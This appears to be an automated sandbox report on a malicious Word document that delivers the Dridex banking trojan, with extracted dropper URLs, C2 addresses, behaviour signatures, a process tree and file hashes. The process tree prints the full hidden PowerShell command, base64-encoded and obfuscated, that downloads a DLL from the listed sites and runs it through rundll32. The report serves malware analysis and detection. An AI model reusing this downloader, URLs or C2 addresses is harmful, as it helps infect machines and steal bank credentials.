Analysis

  • max time kernel
    146s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    09-12-2020 05:23

General

  • Target

    Inv.Docum_323925335.doc

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://mountainceramic.com/kx8vjddb.rar

exe.dropper

http://siemensagent.com/ny2tqv.zip

exe.dropper

https://final.makkahkmcc.com/shqay5y.rar

exe.dropper

https://bhasinbrothers.com/cdy7qodb.rar

exe.dropper

https://test.chongthamsika.com.vn/jl4gs4ar.zip

exe.dropper

https://skvflexandoffset.in/igjkrk3.rar

exe.dropper

http://weedcompare.co.uk/mkcy8uttq.zip

exe.dropper

https://thisismycurrentproject.com/rtftdo.rar

Extracted

Family

dridex

Botnet

10555

C2

104.131.164.93:443

46.101.90.205:4643

27.254.174.84:4443

92.94.251.127:3786

rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Dridex Loader 1 IoCs

    Detects Dridex both x86 and x64 loader in memory.

  • Blocklisted process makes network request 6 IoCs
  • Loads dropped DLL 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Inv.Docum_323925335.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1908
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IABTAEUAVAAtAEkAVABlAG0AIABWAEEAUgBpAEEAQgBMAEUAOgBNADMANgBxADkAIAAgACgAWwB0AFkAUABFAF0AKAAiAHsAMQB9AHsAMwB9AHsANQB9AHsANAB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAFQATwBSAFkAJwAsACcAcwBZAFMAdABFACcALAAnAEMAJwAsACcAbQAuAEkAJwAsACcAZQAnACwAJwBPAC4AZABJAFIAJwApACAAIAApACAAIAA7AFMARQBUAC0AVgBhAFIASQBBAEIAbABlACAAKAAiAEQAbQAyACIAKwAiAEkAcgAiACkAIAAoAFsAdABZAHAARQBdACgAIgB7ADUAfQB7ADgAfQB7ADIAfQB7ADYAfQB7ADMAfQB7ADEAfQB7ADcAfQB7ADAAfQB7ADQAfQAiACAALQBGACcATgBUACcALAAnAE8AJwAsACcAZQAnACwAJwBwACcALAAnAE0AQQBOAGEARwBlAFIAJwAsACcAcwBZAFMAVABFACcALAAnAHIAVgBJAGMAZQAnACwAJwBJACcALAAnAG0ALgBuAEUAVAAuAFMAJwApACAAKQAgADsAJABGADIAcgBnADYAXwBtAD0AKAAoACcAVwAnACsAJwA1AGcAaAAwADIAJwApACsAJwBlACcAKQA7ACQAUwBlAG4AbQBoAHIAegA9ACQAUwBrADUAOQA3AHIAMQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQARgBuADEAaAA1AGYAYwA7ACQATgAzAGQAcQBhAHQAbwA9ACgAJwBKACcAKwAoACcAcQBfAG8AawAnACsAJwB3ACcAKQArACcAOAAnACkAOwAgACgAVgBBAHIAaQBhAEIATABFACAAbQAzADYAUQA5ACAAIAAtAFYAYQBMAHUAZQBvAG4ATABZACkAOgA6ACIAYwBSAEUAYQB0AEUAZABJAGAAUgBFAGAAYwB0AGAAbwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQAnACsAKAAnAFEAMQAnACsAJwA1ACcAKQArACcANwBoAHIANQB7ADAAfQAnACsAKAAnAEIAMAAnACsAJwB3ADQAdAAnACsAJwBjACcAKQArACcAdwB7ADAAJwArACcAfQAnACkALQBGACAAWwBDAGgAYQBSAF0AOQAyACkAKQA7ACQAVgA0AGMAagBpAHoAMQA9ACgAKAAnAEEAJwArACcAYQAwAHMAagAnACkAKwAnAGYAdAAnACkAOwAgACAAKAAgAHYAQQBSAEkAQQBCAGwAZQAgACAAKAAiAGQAbQAyACIAKwAiAGkAcgAiACkAIAAgACkALgBWAGEAbAB1AEUAOgA6ACIAcwBFAGAAQwBVAHIAaQB0AHkAUABgAFIAbwB0AGAATwBjAGAAbwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABUAHUAegBnAHgAegA0AD0AKAAoACcAVwAnACsAJwBnAHUAJwApACsAJwBwAHIAJwArACcAbQBnACcAKQA7ACQAWQBiAGkAMwBmAHEAOQAgAD0AIAAoACcATAAnACsAKAAnAG8AJwArACcAbwBiACcAKwAnAGQANQBvACcAKQArACcANQAnACkAOwAkAEkAcABhAHUANwBwAGkAPQAoACcARwAnACsAJwB4ADEAJwArACgAJwA4ADIAegAnACsAJwBlACcAKQApADsAJABXAG4AYwBmAGsAawB6AD0AKAAoACcASgBjACcAKwAnADYAMgAnACkAKwAnAHMAeQAnACsAJwA5ACcAKQA7ACQASABwAHMAcgB5AHoAbQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AFEAMQA1ADcAJwArACcAaAAnACsAJwByACcAKwAnADUAewAwACcAKwAnAH0AQgAnACsAKAAnADAAdwAnACsAJwA0AHQAYwAnACkAKwAnAHcAewAwAH0AJwApACAAIAAtAGYAIABbAEMAaABhAFIAXQA5ADIAKQArACQAWQBiAGkAMwBmAHEAOQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQAVwBlAGsAagA0AHgAXwA9ACgAJwBIACcAKwAnAHQAJwArACgAJwBpADEAJwArACcAcgB6ADEAJwApACkAOwAkAEYAZQBrADgAaABiAHUAPQBOAGUAYAB3AC0AbwBCAGAAagBlAGAAQwBUACAAbgBFAHQALgBXAGUAYgBDAGwASQBlAE4AVAA7ACQASAB2AHoAbwBoAGMAMgA9ACgAKAAnAGgAdAAnACsAKAAoACcAdABwAHMAOgBxACcAKwAnAGEAJwArACcAKQAoADYANwApACgAcQBhACcAKwAnACkAJwApACkAKwAoACcAKAAnACsAJwA2ADcAKQAnACkAKwAoACgAJwAoAG0AJwApACkAKwAnAG8AJwArACgAJwB1AG4AJwArACcAdABhAGkAbgBjACcAKQArACgAJwBlAHIAYQBtACcAKwAnAGkAYwAnACsAJwAuACcAKQArACgAJwBjAG8AbQAnACsAJwBxACcAKQArACgAKAAnAGEAKQAnACsAJwAoADYAJwApACkAKwAoACgAJwA3ACkAKABrAHgAJwArACcAOAB2AGoAJwArACcAZABkACcAKwAnAGIALgAnACkAKQArACgAJwByACcAKwAnAGEAcgBAACcAKwAnAGgAdAB0AHAAOgAnACkAKwAoACgAJwBxACcAKwAnAGEAJwArACcAKQAoADYANwAnACkAKQArACgAKAAnACkAJwArACcAKABxAGEAJwApACkAKwAoACgAJwApACgANgA3ACkAKABzACcAKwAnAGkAZQBtAGUAJwArACcAbgBzAGEAJwArACcAZwAnACsAJwBlACcAKwAnAG4AdAAnACkAKQArACgAKAAnAC4AYwBvAG0AcQBhACcAKwAnACkAJwArACcAKAA2ADcAKQAnACkAKQArACgAKAAnACgAbgB5ACcAKwAnADIAdABxAHYALgB6ACcAKwAnAGkAJwArACcAcABAACcAKQApACsAJwBoAHQAJwArACgAKAAnAHQAcABzADoAcQBhACcAKwAnACkAKAAnACsAJwA2ACcAKQApACsAJwA3ACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwBxACcAKwAnAGEAKQAoADYAJwApACkAKwAoACgAJwA3ACcAKwAnACkAKABmAGkAbgAnACsAJwBhACcAKwAnAGwALgBtACcAKQApACsAKAAnAGEAawAnACsAJwBrAGEAaABrAG0AYwBjAC4AYwAnACsAJwBvACcAKwAnAG0AJwApACsAKAAoACcAcQBhACkAKAAnACsAJwA2ADcAKQAoACcAKwAnAHMAJwApACkAKwAnAGgAcQAnACsAKAAnAGEAJwArACcAeQA1ACcAKwAnAHkAJwArACcALgByAGEAcgBAACcAKQArACgAJwBoACcAKwAnAHQAdABwACcAKwAnAHMAOgAnACkAKwAoACgAJwBxACcAKwAnAGEAKQAnACkAKQArACgAJwAoADYANwAnACsAJwApACgAcQBhACkAJwApACsAKAAoACcAKAA2ACcAKwAnADcAJwApACkAKwAoACgAJwApACgAJwApACkAKwAoACcAYgBoAGEAJwArACcAcwAnACsAJwBpAG4AYgByAG8AdABoACcAKQArACgAJwBlAHIAcwAnACsAJwAuACcAKwAnAGMAbwBtAHEAJwApACsAKAAoACcAYQApACcAKwAnACgAJwArACcANgA3ACkAKABjACcAKQApACsAJwBkAHkAJwArACcANwAnACsAKAAnAHEAbwBkAGIAJwArACcALgByAGEAcgAnACsAJwBAACcAKQArACgAKAAnAGgAdAB0ACcAKwAnAHAAcwA6AHEAJwArACcAYQApACcAKQApACsAJwAoACcAKwAoACgAJwA2ADcAJwArACcAKQAnACkAKQArACgAKAAnACgAJwArACcAcQBhACkAJwArACcAKAA2ADcAJwApACkAKwAnACkAJwArACgAKAAnACgAdAAnACsAJwBlACcAKQApACsAKAAnAHMAdAAuAGMAaABvAG4AJwArACcAZwB0AGgAJwArACcAYQBtAHMAJwApACsAJwBpACcAKwAoACcAawBhAC4AJwArACcAYwBvACcAKQArACgAKAAnAG0ALgAnACsAJwB2AG4AJwArACcAcQBhACkAKAA2ACcAKwAnADcAKQAoACcAKQApACsAJwBqACcAKwAnAGwAJwArACgAJwA0ACcAKwAnAGcAcwA0AGEAcgAnACsAJwAuAHoAJwApACsAKAAnAGkAcABAACcAKwAnAGgAdAB0ACcAKwAnAHAAJwApACsAJwBzADoAJwArACgAKAAnAHEAYQApACgANgAnACsAJwA3ACcAKwAnACkAKAAnACkAKQArACgAKAAnAHEAYQAnACsAJwApACcAKQApACsAJwAoACcAKwAoACgAJwA2ADcAKQAoAHMAJwArACcAawAnACsAJwB2AGYAbAAnACsAJwBlAHgAYQBuAGQAbwBmAGYAcwBlAHQALgAnACsAJwBpACcAKQApACsAKAAoACcAbgBxACcAKwAnAGEAJwArACcAKQAoACcAKwAnADYANwApACgAaQBnAGoAJwApACkAKwAnAGsAcgAnACsAKAAoACcAawAnACsAJwAzAC4AcgAnACsAJwBhAHIAQABoACcAKwAnAHQAdABwADoAcQAnACsAJwBhACkAKAAnACkAKQArACgAKAAnADYAJwArACcANwApACgAcQBhACkAJwArACcAKAA2ADcAJwArACcAKQAoACcAKwAnAHcAZQAnACkAKQArACgAJwBlAGQAJwArACcAYwBvAG0AJwApACsAJwBwAGEAJwArACgAJwByACcAKwAnAGUALgAnACkAKwAnAGMAbwAnACsAKAAoACcALgB1ACcAKwAnAGsAcQAnACsAJwBhACkAKAA2ADcAKQAoAG0AawAnACsAJwBjAHkAJwApACkAKwAoACcAOAB1AHQAdAAnACsAJwBxAC4AegAnACsAJwBpACcAKQArACgAKAAnAHAAJwArACcAQAAnACsAJwBoAHQAdABwAHMAJwArACcAOgBxAGEAKQAnACkAKQArACgAJwAoADYAJwArACcANwApACcAKQArACgAKAAnACgAcQBhACcAKwAnACkAKAA2ADcAJwArACcAKQAoAHQAJwArACcAaABpACcAKwAnAHMAaQAnACsAJwBzAG0AJwApACkAKwAoACcAeQBjAHUAcgByACcAKwAnAGUAJwArACcAbgAnACkAKwAnAHQAJwArACcAcAByACcAKwAoACgAJwBvAGoAZQAnACsAJwBjACcAKwAnAHQALgBjAG8AbQAnACsAJwBxAGEAKQAoACcAKQApACsAKAAoACcANgA3ACkAJwArACcAKAAnACsAJwByAHQAZgB0ACcAKQApACsAKAAnAGQAbwAuAHIAYQAnACsAJwByACcAKQApACkALgAiAHIAZQBgAFAATABhAGMAZQAiACgAKAAoACgAKAAnAHEAYQAnACsAJwApACcAKQApACsAKAAnACgANgAnACsAJwA3ACkAJwApACsAJwAoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoACcAKwAnAHcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABsAGkAdAAiACgAJABHAGMAaQBxAGwAeQAzACAAKwAgACQAUwBlAG4AbQBoAHIAegAgACsAIAAkAFQAZwBoADUAdQByAHAAKQA7ACQAUwB0AGIAdwBvADcAZwA9ACgAJwBKAGwAJwArACgAJwA2ADMAYwAwACcAKwAnAG0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFYANQBxADcAbQBtAGMAIABpAG4AIAAkAEgAdgB6AG8AaABjADIAIAB8ACAAUwBPAGAAUgB0AGAALQBgAE8AQgBqAEUAYABjAHQAIAB7AGcARQB0AC0AYABSAGEAbgBgAEQAYABvAE0AfQApAHsAdAByAHkAewAkAEYAZQBrADgAaABiAHUALgAiAGQAbwBXAGAATgBMAGAATwBBAGQAYABGAEkATABFACIAKAAkAFYANQBxADcAbQBtAGMALAAgACQASABwAHMAcgB5AHoAbQApADsAJABKAGYAcwBxAHAAcgA3AD0AKAAoACcASQAnACsAJwBpAHQAdwBxACcAKQArACcAZgBoACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABIAHAAcwByAHkAegBtACkALgAiAGwARQBOAGAAZwBUAGgAIgAgAC0AZwBlACAANAA2ADQAMAAzACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuAGQAbABsADMAMgAuAGUAeAAnACsAJwBlACcAKQAgACQASABwAHMAcgB5AHoAbQAsADAAOwAkAFEAYQAwAHkAZABsAG8APQAoACgAJwBBACcAKwAnAGMAXwA1ACcAKQArACgAJwBhACcAKwAnAGEAMwAnACkAKQA7AGIAcgBlAGEAawA7ACQATgByAHAAXwBfAGcAaQA9ACgAJwBWACcAKwAoACcAawBmAG0AJwArACcAdQAzAGkAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAeQBwADAAbwBiAGoAPQAoACcAQwB1ACcAKwAoACcAcABvADcAJwArACcAcABtACcAKQApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:532
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD IABTAEUAVAAtAEkAVABlAG0AIABWAEEAUgBpAEEAQgBMAEUAOgBNADMANgBxADkAIAAgACgAWwB0AFkAUABFAF0AKAAiAHsAMQB9AHsAMwB9AHsANQB9AHsANAB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAFQATwBSAFkAJwAsACcAcwBZAFMAdABFACcALAAnAEMAJwAsACcAbQAuAEkAJwAsACcAZQAnACwAJwBPAC4AZABJAFIAJwApACAAIAApACAAIAA7AFMARQBUAC0AVgBhAFIASQBBAEIAbABlACAAKAAiAEQAbQAyACIAKwAiAEkAcgAiACkAIAAoAFsAdABZAHAARQBdACgAIgB7ADUAfQB7ADgAfQB7ADIAfQB7ADYAfQB7ADMAfQB7ADEAfQB7ADcAfQB7ADAAfQB7ADQAfQAiACAALQBGACcATgBUACcALAAnAE8AJwAsACcAZQAnACwAJwBwACcALAAnAE0AQQBOAGEARwBlAFIAJwAsACcAcwBZAFMAVABFACcALAAnAHIAVgBJAGMAZQAnACwAJwBJACcALAAnAG0ALgBuAEUAVAAuAFMAJwApACAAKQAgADsAJABGADIAcgBnADYAXwBtAD0AKAAoACcAVwAnACsAJwA1AGcAaAAwADIAJwApACsAJwBlACcAKQA7ACQAUwBlAG4AbQBoAHIAegA9ACQAUwBrADUAOQA3AHIAMQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQARgBuADEAaAA1AGYAYwA7ACQATgAzAGQAcQBhAHQAbwA9ACgAJwBKACcAKwAoACcAcQBfAG8AawAnACsAJwB3ACcAKQArACcAOAAnACkAOwAgACgAVgBBAHIAaQBhAEIATABFACAAbQAzADYAUQA5ACAAIAAtAFYAYQBMAHUAZQBvAG4ATABZACkAOgA6ACIAYwBSAEUAYQB0AEUAZABJAGAAUgBFAGAAYwB0AGAAbwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQAnACsAKAAnAFEAMQAnACsAJwA1ACcAKQArACcANwBoAHIANQB7ADAAfQAnACsAKAAnAEIAMAAnACsAJwB3ADQAdAAnACsAJwBjACcAKQArACcAdwB7ADAAJwArACcAfQAnACkALQBGACAAWwBDAGgAYQBSAF0AOQAyACkAKQA7ACQAVgA0AGMAagBpAHoAMQA9ACgAKAAnAEEAJwArACcAYQAwAHMAagAnACkAKwAnAGYAdAAnACkAOwAgACAAKAAgAHYAQQBSAEkAQQBCAGwAZQAgACAAKAAiAGQAbQAyACIAKwAiAGkAcgAiACkAIAAgACkALgBWAGEAbAB1AEUAOgA6ACIAcwBFAGAAQwBVAHIAaQB0AHkAUABgAFIAbwB0AGAATwBjAGAAbwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABUAHUAegBnAHgAegA0AD0AKAAoACcAVwAnACsAJwBnAHUAJwApACsAJwBwAHIAJwArACcAbQBnACcAKQA7ACQAWQBiAGkAMwBmAHEAOQAgAD0AIAAoACcATAAnACsAKAAnAG8AJwArACcAbwBiACcAKwAnAGQANQBvACcAKQArACcANQAnACkAOwAkAEkAcABhAHUANwBwAGkAPQAoACcARwAnACsAJwB4ADEAJwArACgAJwA4ADIAegAnACsAJwBlACcAKQApADsAJABXAG4AYwBmAGsAawB6AD0AKAAoACcASgBjACcAKwAnADYAMgAnACkAKwAnAHMAeQAnACsAJwA5ACcAKQA7ACQASABwAHMAcgB5AHoAbQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AFEAMQA1ADcAJwArACcAaAAnACsAJwByACcAKwAnADUAewAwACcAKwAnAH0AQgAnACsAKAAnADAAdwAnACsAJwA0AHQAYwAnACkAKwAnAHcAewAwAH0AJwApACAAIAAtAGYAIABbAEMAaABhAFIAXQA5ADIAKQArACQAWQBiAGkAMwBmAHEAOQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQAVwBlAGsAagA0AHgAXwA9ACgAJwBIACcAKwAnAHQAJwArACgAJwBpADEAJwArACcAcgB6ADEAJwApACkAOwAkAEYAZQBrADgAaABiAHUAPQBOAGUAYAB3AC0AbwBCAGAAagBlAGAAQwBUACAAbgBFAHQALgBXAGUAYgBDAGwASQBlAE4AVAA7ACQASAB2AHoAbwBoAGMAMgA9ACgAKAAnAGgAdAAnACsAKAAoACcAdABwAHMAOgBxACcAKwAnAGEAJwArACcAKQAoADYANwApACgAcQBhACcAKwAnACkAJwApACkAKwAoACcAKAAnACsAJwA2ADcAKQAnACkAKwAoACgAJwAoAG0AJwApACkAKwAnAG8AJwArACgAJwB1AG4AJwArACcAdABhAGkAbgBjACcAKQArACgAJwBlAHIAYQBtACcAKwAnAGkAYwAnACsAJwAuACcAKQArACgAJwBjAG8AbQAnACsAJwBxACcAKQArACgAKAAnAGEAKQAnACsAJwAoADYAJwApACkAKwAoACgAJwA3ACkAKABrAHgAJwArACcAOAB2AGoAJwArACcAZABkACcAKwAnAGIALgAnACkAKQArACgAJwByACcAKwAnAGEAcgBAACcAKwAnAGgAdAB0AHAAOgAnACkAKwAoACgAJwBxACcAKwAnAGEAJwArACcAKQAoADYANwAnACkAKQArACgAKAAnACkAJwArACcAKABxAGEAJwApACkAKwAoACgAJwApACgANgA3ACkAKABzACcAKwAnAGkAZQBtAGUAJwArACcAbgBzAGEAJwArACcAZwAnACsAJwBlACcAKwAnAG4AdAAnACkAKQArACgAKAAnAC4AYwBvAG0AcQBhACcAKwAnACkAJwArACcAKAA2ADcAKQAnACkAKQArACgAKAAnACgAbgB5ACcAKwAnADIAdABxAHYALgB6ACcAKwAnAGkAJwArACcAcABAACcAKQApACsAJwBoAHQAJwArACgAKAAnAHQAcABzADoAcQBhACcAKwAnACkAKAAnACsAJwA2ACcAKQApACsAJwA3ACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwBxACcAKwAnAGEAKQAoADYAJwApACkAKwAoACgAJwA3ACcAKwAnACkAKABmAGkAbgAnACsAJwBhACcAKwAnAGwALgBtACcAKQApACsAKAAnAGEAawAnACsAJwBrAGEAaABrAG0AYwBjAC4AYwAnACsAJwBvACcAKwAnAG0AJwApACsAKAAoACcAcQBhACkAKAAnACsAJwA2ADcAKQAoACcAKwAnAHMAJwApACkAKwAnAGgAcQAnACsAKAAnAGEAJwArACcAeQA1ACcAKwAnAHkAJwArACcALgByAGEAcgBAACcAKQArACgAJwBoACcAKwAnAHQAdABwACcAKwAnAHMAOgAnACkAKwAoACgAJwBxACcAKwAnAGEAKQAnACkAKQArACgAJwAoADYANwAnACsAJwApACgAcQBhACkAJwApACsAKAAoACcAKAA2ACcAKwAnADcAJwApACkAKwAoACgAJwApACgAJwApACkAKwAoACcAYgBoAGEAJwArACcAcwAnACsAJwBpAG4AYgByAG8AdABoACcAKQArACgAJwBlAHIAcwAnACsAJwAuACcAKwAnAGMAbwBtAHEAJwApACsAKAAoACcAYQApACcAKwAnACgAJwArACcANgA3ACkAKABjACcAKQApACsAJwBkAHkAJwArACcANwAnACsAKAAnAHEAbwBkAGIAJwArACcALgByAGEAcgAnACsAJwBAACcAKQArACgAKAAnAGgAdAB0ACcAKwAnAHAAcwA6AHEAJwArACcAYQApACcAKQApACsAJwAoACcAKwAoACgAJwA2ADcAJwArACcAKQAnACkAKQArACgAKAAnACgAJwArACcAcQBhACkAJwArACcAKAA2ADcAJwApACkAKwAnACkAJwArACgAKAAnACgAdAAnACsAJwBlACcAKQApACsAKAAnAHMAdAAuAGMAaABvAG4AJwArACcAZwB0AGgAJwArACcAYQBtAHMAJwApACsAJwBpACcAKwAoACcAawBhAC4AJwArACcAYwBvACcAKQArACgAKAAnAG0ALgAnACsAJwB2AG4AJwArACcAcQBhACkAKAA2ACcAKwAnADcAKQAoACcAKQApACsAJwBqACcAKwAnAGwAJwArACgAJwA0ACcAKwAnAGcAcwA0AGEAcgAnACsAJwAuAHoAJwApACsAKAAnAGkAcABAACcAKwAnAGgAdAB0ACcAKwAnAHAAJwApACsAJwBzADoAJwArACgAKAAnAHEAYQApACgANgAnACsAJwA3ACcAKwAnACkAKAAnACkAKQArACgAKAAnAHEAYQAnACsAJwApACcAKQApACsAJwAoACcAKwAoACgAJwA2ADcAKQAoAHMAJwArACcAawAnACsAJwB2AGYAbAAnACsAJwBlAHgAYQBuAGQAbwBmAGYAcwBlAHQALgAnACsAJwBpACcAKQApACsAKAAoACcAbgBxACcAKwAnAGEAJwArACcAKQAoACcAKwAnADYANwApACgAaQBnAGoAJwApACkAKwAnAGsAcgAnACsAKAAoACcAawAnACsAJwAzAC4AcgAnACsAJwBhAHIAQABoACcAKwAnAHQAdABwADoAcQAnACsAJwBhACkAKAAnACkAKQArACgAKAAnADYAJwArACcANwApACgAcQBhACkAJwArACcAKAA2ADcAJwArACcAKQAoACcAKwAnAHcAZQAnACkAKQArACgAJwBlAGQAJwArACcAYwBvAG0AJwApACsAJwBwAGEAJwArACgAJwByACcAKwAnAGUALgAnACkAKwAnAGMAbwAnACsAKAAoACcALgB1ACcAKwAnAGsAcQAnACsAJwBhACkAKAA2ADcAKQAoAG0AawAnACsAJwBjAHkAJwApACkAKwAoACcAOAB1AHQAdAAnACsAJwBxAC4AegAnACsAJwBpACcAKQArACgAKAAnAHAAJwArACcAQAAnACsAJwBoAHQAdABwAHMAJwArACcAOgBxAGEAKQAnACkAKQArACgAJwAoADYAJwArACcANwApACcAKQArACgAKAAnACgAcQBhACcAKwAnACkAKAA2ADcAJwArACcAKQAoAHQAJwArACcAaABpACcAKwAnAHMAaQAnACsAJwBzAG0AJwApACkAKwAoACcAeQBjAHUAcgByACcAKwAnAGUAJwArACcAbgAnACkAKwAnAHQAJwArACcAcAByACcAKwAoACgAJwBvAGoAZQAnACsAJwBjACcAKwAnAHQALgBjAG8AbQAnACsAJwBxAGEAKQAoACcAKQApACsAKAAoACcANgA3ACkAJwArACcAKAAnACsAJwByAHQAZgB0ACcAKQApACsAKAAnAGQAbwAuAHIAYQAnACsAJwByACcAKQApACkALgAiAHIAZQBgAFAATABhAGMAZQAiACgAKAAoACgAKAAnAHEAYQAnACsAJwApACcAKQApACsAKAAnACgANgAnACsAJwA3ACkAJwApACsAJwAoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoACcAKwAnAHcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABsAGkAdAAiACgAJABHAGMAaQBxAGwAeQAzACAAKwAgACQAUwBlAG4AbQBoAHIAegAgACsAIAAkAFQAZwBoADUAdQByAHAAKQA7ACQAUwB0AGIAdwBvADcAZwA9ACgAJwBKAGwAJwArACgAJwA2ADMAYwAwACcAKwAnAG0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFYANQBxADcAbQBtAGMAIABpAG4AIAAkAEgAdgB6AG8AaABjADIAIAB8ACAAUwBPAGAAUgB0AGAALQBgAE8AQgBqAEUAYABjAHQAIAB7AGcARQB0AC0AYABSAGEAbgBgAEQAYABvAE0AfQApAHsAdAByAHkAewAkAEYAZQBrADgAaABiAHUALgAiAGQAbwBXAGAATgBMAGAATwBBAGQAYABGAEkATABFACIAKAAkAFYANQBxADcAbQBtAGMALAAgACQASABwAHMAcgB5AHoAbQApADsAJABKAGYAcwBxAHAAcgA3AD0AKAAoACcASQAnACsAJwBpAHQAdwBxACcAKQArACcAZgBoACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABIAHAAcwByAHkAegBtACkALgAiAGwARQBOAGAAZwBUAGgAIgAgAC0AZwBlACAANAA2ADQAMAAzACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuAGQAbABsADMAMgAuAGUAeAAnACsAJwBlACcAKQAgACQASABwAHMAcgB5AHoAbQAsADAAOwAkAFEAYQAwAHkAZABsAG8APQAoACgAJwBBACcAKwAnAGMAXwA1ACcAKQArACgAJwBhACcAKwAnAGEAMwAnACkAKQA7AGIAcgBlAGEAawA7ACQATgByAHAAXwBfAGcAaQA9ACgAJwBWACcAKwAoACcAawBmAG0AJwArACcAdQAzAGkAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAeQBwADAAbwBiAGoAPQAoACcAQwB1ACcAKwAoACcAcABvADcAJwArACcAcABtACcAKQApAA==
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1108
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dll 0
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1044
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dll 0
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Checks whether UAC is enabled
            PID:652

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dll
      MD5

      4d190777a54d9e69dcccf33162abe2cd

      SHA1

      ab5f34153b8f8255fe4fc24a18bede6f3d93d142

      SHA256

      53761d0f5f72217c474b25194266d8eb6cb443ef24b7cb8faf5fa1c5be9c4bcc

      SHA512

      26db1b9a3a0a139ad053ba412c2b8df9629b5a104586373f380facfd0514473c25674450b87b6f7e54010b05e3f8b140224e0b467f6fda346bdf8d12980cb407

    • \Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dll
      MD5

      4d190777a54d9e69dcccf33162abe2cd

      SHA1

      ab5f34153b8f8255fe4fc24a18bede6f3d93d142

      SHA256

      53761d0f5f72217c474b25194266d8eb6cb443ef24b7cb8faf5fa1c5be9c4bcc

      SHA512

      26db1b9a3a0a139ad053ba412c2b8df9629b5a104586373f380facfd0514473c25674450b87b6f7e54010b05e3f8b140224e0b467f6fda346bdf8d12980cb407

    • \Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dll
      MD5

      4d190777a54d9e69dcccf33162abe2cd

      SHA1

      ab5f34153b8f8255fe4fc24a18bede6f3d93d142

      SHA256

      53761d0f5f72217c474b25194266d8eb6cb443ef24b7cb8faf5fa1c5be9c4bcc

      SHA512

      26db1b9a3a0a139ad053ba412c2b8df9629b5a104586373f380facfd0514473c25674450b87b6f7e54010b05e3f8b140224e0b467f6fda346bdf8d12980cb407

    • \Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dll
      MD5

      4d190777a54d9e69dcccf33162abe2cd

      SHA1
